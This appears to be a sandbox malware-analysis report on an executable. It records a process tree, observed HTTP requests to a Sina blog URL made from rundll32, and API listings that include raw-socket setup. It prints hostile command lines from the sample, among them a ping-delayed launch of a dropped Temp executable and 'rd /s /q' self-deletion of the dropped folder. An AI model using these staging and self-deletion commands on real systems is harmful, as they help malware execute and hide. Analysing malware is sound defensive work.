                                                      2024-12-11 15:25:26 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      19 | 192.168.2.9 | 57802 | 202.108.0.52 | 443 | 7556 | C:\Windows\SysWOW64\rundll32.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-11 15:25:30 UTC | 142 | OUT | GET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Connection: Keep-Alive



                                                      Target ID:0
                                                      Start time:10:23:42
                                                      Start date:11/12/2024
                                                      Path:C:\Users\user\Desktop\XgijTrY6No.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\XgijTrY6No.exe"
                                                      Imagebase:0x400000
                                                      File size:87'284 bytes
                                                      MD5 hash:FC2914434D6121F5E04E8E70E235C239
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:10:23:42
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:cmd.exe /c ping 127.0.0.1 -n 2&C:\Users\user\AppData\Local\Temp\\mszcy.exe "C:\Users\user\Desktop\XgijTrY6No.exe"
                                                      Imagebase:0xc50000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:10:23:42
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:10:23:42
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\SysWOW64\PING.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:ping 127.0.0.1 -n 2
                                                      Imagebase:0xd90000
                                                      File size:18'944 bytes
                                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:10:23:43
                                                      Start date:11/12/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\mszcy.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Local\Temp\\mszcy.exe "C:\Users\user\Desktop\XgijTrY6No.exe"
                                                      Imagebase:0x400000
                                                      File size:87'764 bytes
                                                      MD5 hash:847CCE07E3BF3D974D1D089F5028E95F
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:10:23:43
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:c:\windows\system32\rundll32.exe "c:\ftelcs\rjqzr.dll",QueryPluginInterface C:\Users\user\AppData\Local\Temp\mszcy.exe
                                                      Imagebase:0xfd0000
                                                      File size:61'440 bytes
                                                      MD5 hash:889B99C52A60DD49227C5E485A016679
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:8
                                                      Start time:10:23:55
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\windows\SysWOW64\rundll32.exe" "c:\ftelcs\rjqzr.dll",QueryPluginInterface
                                                      Imagebase:0xfd0000
                                                      File size:61'440 bytes
                                                      MD5 hash:889B99C52A60DD49227C5E485A016679
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:10:23:56
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ftelcs"
                                                      Imagebase:0xc50000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:10:23:56
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:10:23:56
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\SysWOW64\PING.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:ping 127.0.0.1 -n 3
                                                      Imagebase:0xd90000
                                                      File size:18'944 bytes
                                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:10:24:04
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\windows\SysWOW64\rundll32.exe" "c:\ftelcs\rjqzr.dll",QueryPluginInterface
                                                      Imagebase:0xfd0000
                                                      File size:61'440 bytes
                                                      MD5 hash:889B99C52A60DD49227C5E485A016679
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:10:24:04
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ftelcs"
                                                      Imagebase:0xc50000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:15
                                                      Start time:10:24:04
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:16
                                                      Start time:10:24:04
                                                      Start date:11/12/2024
                                                      Path:C:\Windows\SysWOW64\PING.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:ping 127.0.0.1 -n 3
                                                      Imagebase:0xd90000
                                                      File size:18'944 bytes
                                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true


                                                        Execution Graph

                                                        Execution Coverage:12%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:15.2%
                                                        Total number of Nodes:276
                                                        Total number of Limit Nodes:7

                                                        Control-flow Graph

                                                        APIs
                                                        • FindResourceA.KERNEL32(00000000,00000084,IMAGE), ref: 00401A46
                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401A54
                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401A69
                                                        • LockResource.KERNEL32(00000000,00000000), ref: 00401A74
                                                        • memcpy.MSVCRT(00000000,00000000), ref: 00401A7C
                                                        • wsprintfA.USER32 ref: 00401B2B
                                                        • CreateDirectoryA.KERNEL32(?,00000000), ref: 00401B38
                                                        • Sleep.KERNEL32(00000064), ref: 00401B40
                                                        • memset.MSVCRT ref: 00401B4D
                                                        • wsprintfA.USER32 ref: 00401B74
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: Resource$wsprintf$CreateDirectoryFindLoadLockSizeofSleepmemcpymemset
                                                        • String ID: IMAGE

                                                        Control-flow Graph

                                                        APIs
                                                        • #823.MFC42(00100000), ref: 00401879
                                                        • memset.MSVCRT ref: 00401888
                                                        • __p___argv.MSVCRT ref: 00401897
                                                          • Part of subcall function 004017B2: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004017ED
                                                        • __p___argv.MSVCRT ref: 004018B9
                                                          • Part of subcall function 004017B2: memset.MSVCRT ref: 00401814
                                                          • Part of subcall function 004017B2: ReadFile.KERNELBASE(?,?,00001000,?,00000000), ref: 0040182C
                                                          • Part of subcall function 004017B2: memcpy.MSVCRT(?,?,?), ref: 00401847
                                                          • Part of subcall function 004017B2: CloseHandle.KERNELBASE(?), ref: 00401859
                                                        • Sleep.KERNEL32(00000064), ref: 004018CE
                                                        • GetTickCount.KERNEL32 ref: 00401906
                                                        • GetTempPathA.KERNELBASE(00000104,?), ref: 00401936
                                                        • wsprintfA.USER32 ref: 00401953
                                                        • CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00401973
                                                        • #823.MFC42(?), ref: 0040197F
                                                        • Sleep.KERNELBASE(00000064), ref: 0040198A
                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 004019A0
                                                        • Sleep.KERNELBASE(00000064), ref: 004019A4
                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 004019B4
                                                        • CloseHandle.KERNELBASE(?), ref: 004019B9
                                                        • #825.MFC42(?), ref: 004019C2
                                                        • #825.MFC42(?,?), ref: 004019CA
                                                        • __p___argv.MSVCRT ref: 004019E7
                                                        • wsprintfA.USER32 ref: 00401A04
                                                        • WinExec.KERNEL32(?,00000000), ref: 00401A15
                                                        • Sleep.KERNELBASE(000001F4), ref: 00401A20
                                                        • ExitProcess.KERNEL32 ref: 00401A24
                                                        Strings
                                                        • cmd.exe /c ping 127.0.0.1 -n 2&%s "%s", xrefs: 004019FE
                                                        • %s\%s.exe, xrefs: 0040194D
                                                        Similarity
                                                        • API ID: File$Sleep$__p___argv$#823#825CloseCreateHandleWritememsetwsprintf$CountExecExitPathProcessReadTempTickmemcpy
                                                        • String ID: %s\%s.exe$cmd.exe /c ping 127.0.0.1 -n 2&%s "%s"

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                        • String ID: `@

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 30 4017b2-4017f9 call 402ee0 CreateFileA 33 4017fb-4017fd 30->33 34 4017ff-401803 30->34 35 401863-401866 33->35 36 401808-401835 memset ReadFile 34->36 37 401856-401862 CloseHandle 36->37 38 401837-401854 memcpy 36->38 37->35 38->36
                                                        APIs
                                                        • CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004017ED
                                                        • memset.MSVCRT ref: 00401814
                                                        • ReadFile.KERNELBASE(?,?,00001000,?,00000000), ref: 0040182C
                                                        • memcpy.MSVCRT(?,?,?), ref: 00401847
                                                        • CloseHandle.KERNELBASE(?), ref: 00401859
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleReadmemcpymemset

                                                        Control-flow Graph

                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401C6F
                                                        • #1134.MFC42(00000000), ref: 00401C7F
                                                          • Part of subcall function 00401E2A: _EH_prolog.MSVCRT ref: 00401E2F
                                                          • Part of subcall function 00401E2A: #324.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E41
                                                          • Part of subcall function 00401E2A: #567.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E4F
                                                          • Part of subcall function 00401E2A: #567.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E66
                                                          • Part of subcall function 00401E2A: #1168.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E91
                                                          • Part of subcall function 00401E2A: #1146.MFC42(00000080,0000000E,00000080,00000066,?,?,?,?,00401C92,00000000), ref: 00401E9F
                                                          • Part of subcall function 00401E2A: LoadIconA.USER32(00000000,00000080), ref: 00401EA5
                                                        • __p___argv.MSVCRT ref: 00401C9F
                                                        • ExitProcess.KERNEL32 ref: 00401CBE
                                                          • Part of subcall function 00401867: #823.MFC42(00100000), ref: 00401879
                                                          • Part of subcall function 00401867: memset.MSVCRT ref: 00401888
                                                          • Part of subcall function 00401867: __p___argv.MSVCRT ref: 00401897
                                                          • Part of subcall function 00401867: __p___argv.MSVCRT ref: 004018B9
                                                          • Part of subcall function 00401867: Sleep.KERNEL32(00000064), ref: 004018CE
                                                          • Part of subcall function 00401867: GetTickCount.KERNEL32 ref: 00401906
                                                          • Part of subcall function 00401867: GetTempPathA.KERNELBASE(00000104,?), ref: 00401936
                                                          • Part of subcall function 00401867: wsprintfA.USER32 ref: 00401953
                                                          • Part of subcall function 00401867: CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00401973
                                                          • Part of subcall function 00401867: #823.MFC42(?), ref: 0040197F
                                                        • #2514.MFC42 ref: 00401CCA
                                                          • Part of subcall function 00401CEC: _EH_prolog.MSVCRT ref: 00401CF1
                                                          • Part of subcall function 00401CEC: #693.MFC42(?,?,00401CDE), ref: 00401D19
                                                          • Part of subcall function 00401CEC: #609.MFC42(?,?,00401CDE), ref: 00401D25
                                                          • Part of subcall function 00401CEC: #641.MFC42(?,?,00401CDE), ref: 00401D30
                                                        Similarity
                                                        • API ID: H_prolog__p___argv$#567#823$#1134#1146#1168#2514#324#609#641#693CountCreateExitFileIconLoadPathProcessSleepTempTickmemsetwsprintf

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 69 402b5a-402b7a WSAStartup 70 402ba3 WSAGetLastError 69->70 71 402b7c-402b82 69->71 74 402ba9-402bac 70->74 72 402b84-402b90 71->72 73 402b9d WSACleanup 71->73 72->73 75 402b92-402b9b 72->75 73->70 75->74
                                                        APIs
                                                        Similarity
                                                        • API ID: CleanupErrorLastStartup

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 76 4030ae-4030c3 #1576
                                                        APIs
                                                        • #1576.MFC42(?,?,?,V0@,00403056,00000000,?,0000000A), ref: 004030BE
                                                        Strings
                                                        Similarity
                                                        • API ID: #1576
                                                        • String ID: V0@
                                                        • API String ID: 1976119259-1055587443

                                                        Control-flow Graph

                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 004022A4
                                                          • Part of subcall function 004028B1: strncpy.MSVCRT ref: 0040290F
                                                          • Part of subcall function 004028B1: inet_ntoa.WS2_32(?), ref: 00402920
                                                          • Part of subcall function 004028B1: strncpy.MSVCRT ref: 00402927
                                                          • Part of subcall function 004028B1: inet_ntoa.WS2_32(?), ref: 00402932
                                                          • Part of subcall function 004028B1: strncpy.MSVCRT ref: 00402939
                                                          • Part of subcall function 004028B1: sprintf.MSVCRT ref: 0040299E
                                                          • Part of subcall function 004028B1: sprintf.MSVCRT ref: 004029A8
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00402305
                                                        • #540.MFC42 ref: 0040230E
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00402323
                                                        • #3998.MFC42(00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 00402342
                                                        • #6907.MFC42(?,00000001,?,00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 00402352
                                                        • #6907.MFC42(?,00000002,?,?,00000001,?,00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 00402362
                                                        • #2818.MFC42(?,%d/%d,?,?,?,00000002,?,?,00000001,?,00000001,00000000,?,00000000,00000000,00000000), ref: 00402376
                                                        • #6907.MFC42(?,00000003,?,00000000), ref: 00402388
                                                        • GetSystemTime.KERNEL32(?,?,00000003,?,00000000), ref: 00402391
                                                        • #2818.MFC42(?,%2.2d-%2.2d %2.2d:%2.2d:%2.2d,?,?,?,?,?), ref: 004023B9
                                                        • #6907.MFC42(?,00000004,?), ref: 004023CB
                                                        • #6007.MFC42(?,00000000,00000004,00000000,00000000,00000000,00000000,00000000,?,00000004,?), ref: 004023DD
                                                        • #823.MFC42(00000008,?,00000000,00000004,00000000,00000000,00000000,00000000,00000000,?,00000004,?), ref: 004023E8
                                                        • #823.MFC42(?,?,00000000,00000004,00000000,00000000,00000000,00000000,00000000,?,00000004,?), ref: 00402408
                                                        • memcpy.MSVCRT(00000000,?,?,?,00000000,00000004,00000000,00000000,00000000,00000000,00000000,?,00000004,?), ref: 0040241B
                                                        • #6007.MFC42(?,00000000,00000004,00000000,00000000,00000000,00000000,?,?,00000004,?), ref: 00402432
                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,00000000,?,?,00000004,?), ref: 00402449
                                                        • #800.MFC42 ref: 00402456
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #6907$strncpy$#2818#6007#823CriticalSectioninet_ntoasprintf$#3998#540#800EnterH_prologLeaveMessageSendSystemTimememcpy
                                                        • String ID: %2.2d-%2.2d %2.2d:%2.2d:%2.2d$%d/%d
                                                        • API String ID: 53958731-669394826

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 157 40271c-40273c socket 158 402742-402757 gethostname 157->158 159 40280f-402815 WSAGetLastError 157->159 158->159 161 40275d-4027ab gethostbyname htons memcpy bind 158->161 160 402848-40284c 159->160 161->159 162 4027ad-4027e0 setsockopt * 2 161->162 162->159 163 4027e2-40280d WSAIoctl 162->163 163->159 164 402817-40282f CreateThread 163->164 165 402831-402844 closesocket 164->165 166 402846 164->166 165->160 166->160
                                                        APIs
                                                        • socket.WS2_32(00000002,00000003,00000000), ref: 00402730
                                                        • gethostname.WS2_32(?,00000100), ref: 0040274E
                                                        • gethostbyname.WS2_32(?), ref: 00402764
                                                        • htons.WS2_32(?), ref: 00402779
                                                        • memcpy.MSVCRT(?,?,?), ref: 00402791
                                                        • bind.WS2_32(?,00000002,00000010), ref: 004027A2
                                                        • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 004027C9
                                                        • setsockopt.WS2_32(?,00000000,00000002,?,00000004), ref: 004027DB
                                                        • WSAIoctl.WS2_32(?,98000001,?,00000004,?,00000028,?,00000000,00000000), ref: 00402804
                                                        • WSAGetLastError.WS2_32 ref: 0040280F
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_000026B0,?,00000000,00000000), ref: 00402824
                                                        • closesocket.WS2_32(?), ref: 00402838
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: setsockopt$CreateErrorIoctlLastThreadbindclosesocketgethostbynamegethostnamehtonsmemcpysocket
                                                        • String ID:
                                                        • API String ID: 4186165289-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
                                                        • String ID:
                                                        • API String ID: 1397574227-0
                                                        APIs
                                                        • recv.WS2_32(?,?,0000FFFF,00000000), ref: 004026D9
                                                        • WSAGetLastError.WS2_32 ref: 004026E4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastrecv
                                                        • String ID:
                                                        • API String ID: 2514157807-0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: sprintf$htons$strncpy$inet_ntoa$htonlmemcpystrcpy
                                                        • String ID: %s%c$%s:%d$FSRPAU$FSRPAU$Len=%d$flag:$type=%d,code=%d
                                                        • API String ID: 3753906667-237590085

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 97 401160-4011b2 _EH_prolog #537 * 2 #540 98 4011b4-4011cb #2818 97->98 99 4011ea-40120c #6199 #2614 97->99 100 4011da-4011e8 #939 98->100 101 4011cd-4011d5 #941 98->101 102 401211-401219 99->102 103 40120e 99->103 100->98 100->99 101->100 104 4012f8-401346 #6199 * 2 #800 * 3 102->104 105 40121f-401224 102->105 103->102 106 401227-40122d 105->106 107 401233-401252 #2818 106->107 108 4012bd 106->108 110 401261-401271 #939 107->110 111 401254-40125c #941 107->111 109 4012c1-4012ca 108->109 112 4012e3-4012e7 109->112 113 4012cc-4012de #941 * 2 109->113 114 401273-40127c 110->114 115 401295-4012a4 #2818 110->115 111->110 116 4012f5 112->116 117 4012e9-4012ef 112->117 113->112 114->115 118 40127e-401293 #2818 114->118 119 4012a5-4012b5 #939 115->119 116->104 117->105 117->116 118->119 119->106 120 4012bb 119->120 120->109
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401165
                                                        • #537.MFC42(00406598), ref: 0040117E
                                                        • #537.MFC42(00406598,00406598), ref: 0040118B
                                                        • #540.MFC42(00406598,00406598), ref: 00401197
                                                        • #2818.MFC42(?,%6.6X,00000000,00406598,00406598), ref: 004011BE
                                                        • #941.MFC42(00406044), ref: 004011D5
                                                        • #939.MFC42(?), ref: 004011E1
                                                        • #6199.MFC42(?,00406598,00406598), ref: 004011F0
                                                        • #2614.MFC42(?,00406598,00406598), ref: 004011F8
                                                        • #2818.MFC42(?,%2.2X ,?,?,00406598,00406598), ref: 00401247
                                                        • #941.MFC42(00406038), ref: 0040125C
                                                        • #939.MFC42(?), ref: 00401268
                                                        • #2818.MFC42(?,00406034,?,?), ref: 0040128B
                                                        • #2818.MFC42(?,00406030,?), ref: 0040129E
                                                        • #939.MFC42(?,?), ref: 004012AC
                                                        • #941.MFC42(00406044,?,00406598,00406598), ref: 004012D5
                                                        • #941.MFC42(00406044,00406044,?,00406598,00406598), ref: 004012DE
                                                        • #6199.MFC42(?,?,00406598,00406598), ref: 00401301
                                                        • #6199.MFC42(?,?,?,00406598,00406598), ref: 0040130F
                                                        • #800.MFC42(?,?,?,00406598,00406598), ref: 0040131B
                                                        • #800.MFC42(?,?,?,00406598,00406598), ref: 00401327
                                                        • #800.MFC42(?,?,?,00406598,00406598), ref: 00401333
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #2818#941$#6199#800#939$#537$#2614#540H_prolog
